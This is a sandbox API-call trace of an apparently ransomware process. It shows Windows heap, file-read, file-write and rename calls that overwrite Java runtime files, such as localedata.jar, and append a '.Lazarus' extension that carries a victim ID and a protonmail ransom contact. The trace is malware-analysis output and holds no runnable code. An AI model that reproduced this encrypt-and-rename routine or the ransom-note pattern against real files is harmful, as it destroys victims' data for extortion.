lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa8546b2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa8546b2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa8ed01b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21a46d)) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0095.786] AreFileApisANSI () returned 1 [0095.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0095.787] GetLastError () returned 0x0 [0095.787] SetLastError (dwErrCode=0x0) [0095.787] AreFileApisANSI () returned 1 [0095.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0095.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0095.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 58 [0095.787] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.787] GetFileType (hFile=0x368) returned 0x1 [0095.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0095.787] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0095.787] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0095.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0095.980] ReadFile (in: hFile=0x368, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0096.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0096.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0096.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e260 [0096.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0096.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0096.199] GetLastError () returned 0x0 [0096.199] SetLastError (dwErrCode=0x0) [0096.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0096.199] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0096.199] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0096.200] WriteFile (in: hFile=0x368, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0096.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0096.200] CloseHandle (hObject=0x368) returned 1 [0096.200] AreFileApisANSI () returned 1 [0096.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0096.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0096.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 58 [0096.201] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0096.201] GetFileType (hFile=0x368) returned 0x1 [0096.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0096.201] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0096.201] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0096.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0096.204] ReadFile (in: hFile=0x368, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0096.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e378 [0096.206] GetLastError () returned 0x0 [0096.206] SetLastError (dwErrCode=0x0) [0096.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0096.206] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0096.206] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0096.207] WriteFile (in: hFile=0x368, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0096.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0096.207] CloseHandle (hObject=0x368) returned 1 [0096.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0096.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71ca0 [0096.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0096.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ab20 [0096.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0096.207] AreFileApisANSI () returned 1 [0096.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0096.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0096.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 58 [0096.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 120 [0096.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xf0) returned 0x4b890 [0096.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x4b890, cchWideChar=120 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 120 [0096.209] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4b890 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0096.210] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.210] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.210] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5b5, dwReserved0=0x8fc58be4, dwReserved1=0xbba7a368, cFileName="meta-index", cAlternateFileName="META-I~1")) returned 1 [0096.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0096.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0096.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0096.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0096.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8af48 [0096.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0096.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0096.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0096.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0096.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.217] AreFileApisANSI () returned 1 [0096.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index", lpUsedDefaultChar=0x0) returned 54 [0096.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0096.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0096.217] AreFileApisANSI () returned 1 [0096.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0096.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75eb8 [0096.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 54 [0096.217] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0096.218] GetFileType (hFile=0x368) returned 0x1 [0096.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0096.218] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.218] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.218] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.218] CloseHandle (hObject=0x368) returned 1 [0096.218] AreFileApisANSI () returned 1 [0096.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0096.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76200 [0096.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 54 [0096.219] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0096.219] GetFileType (hFile=0x368) returned 0x1 [0096.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0096.219] CloseHandle (hObject=0x368) returned 1 [0096.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0096.220] AreFileApisANSI () returned 1 [0096.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76020 [0096.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 54 [0096.220] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5b5)) returned 1 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.220] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1edd4e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="nashorn.jar", cAlternateFileName="")) returned 1 [0096.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 